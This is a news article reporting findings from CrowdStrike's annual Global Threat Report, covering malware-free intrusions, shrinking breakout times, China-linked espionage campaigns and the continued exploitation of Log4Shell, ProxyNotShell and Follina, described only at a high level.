Threat actors getting smarter as China-linked attacks rise


Cybercriminals are seeking ways to evade antivirus programs and machine-only defenses, leaving security pros increasingly scant time in which to respond.

“As organizations focus on managing remote and hybrid teams, operationalizing years of digital transformation and navigating an uncertain global economy, adversaries have become more sophisticated, relentless, and damaging in their attacks,” said CrowdStrike in its annual Global Threat Report.

ADVERTISEMENT

In a sign that threat actors are trying different methods of attack, the cybersecurity firm observed a continued decline in malware activity. In 2022, 71% of all detections were free from malware, up from 62% in 2021.

“This was partly related to adversaries’ prolific abuse of valid credentials to facilitate access and persistence in victim environments. Another contributing factor was the rate at which new vulnerabilities were disclosed and the speed with which adversaries were able to operationalize exploits,” CrowdStrike said.

Meanwhile, “interactive intrusion campaigns” – or attacks that entailed a more ‘hands-on’ approach from cybercriminals – increased by 50%, suggesting that threat actors are increasingly looking for ways to outsmart automated detections.

Another notable trend is the decrease in breakout time – how long it takes an adversary to move laterally from an initially compromised host to another within the “victim environment” or network of computer systems being targeted. This declined from 98 minutes in 2021 to 84 last year, meaning defenders were under more pressure to detect and respond to an intrusion.

“By responding within breakout time, defenders can minimize costs and other damages caused by attackers. Security teams are encouraged to meet the 1-10-60 rule: detecting threats within the first minute, understanding the threats within 10 minutes, and responding within 60,” said CrowdStrike.

China-linked actors ramp up attacks

CrowdStrike, which tracks over 200 adversaries, observed a surge in what it described as “China-nexus” espionage: last year, threat actors linked to the Asian superpower targeted all 39 global industry sectors across 20 geographic regions.

They primarily attacked organizations in East, Southeast, Central, and South Asia, operating in the government, technology, and telecommunications sectors. European and North American victims accounted for around a quarter of China-affiliated intrusions.

ADVERTISEMENT

Threat actors attempted to collect strategic intelligence, compromise intellectual property, and surveil targeted groups, all key goals of the Chinese Communist Party (CCP). Such nation-state entities are known to target governments for intelligence, while attacking tech organizations to get their hands on research and development data, restricted information, and trade secrets.

“Telecommunications entities present adversaries with the capacity to amplify intelligence collection or

surveillance efforts via direct access to foreign infrastructure,” CrowdStrike added.

Taiwan-based technology companies constituted a key target, likely in support of “CCP goals for technologic [sic] independence and dominance,” with organizations based in the disputed island nation believed to have been targeted by Chinese nationalist hacktivist groups.

Exploiting known vulnerabilities

According to CrowdStrike, last year adversaries reweaponized known vulnerabilities, such as the infamous Log4Shell, which continued to ravage the internet.

The Log4Shell exploitation, initially opportunistic when it emerged in 2021, became sophisticated as adversaries leveraged other protocols and used obfuscation techniques to tailor exploitation in other products where this had not been initially achievable.

Vulnerabilities like ProxyNotShell and Follina – two of Microsoft’s 1,200 vulnerabilities patched in 2022 – were broadly exploited “as nation-nexus and e-crime adversaries circumvented patches and sidestepped mitigations.”

ADVERTISEMENT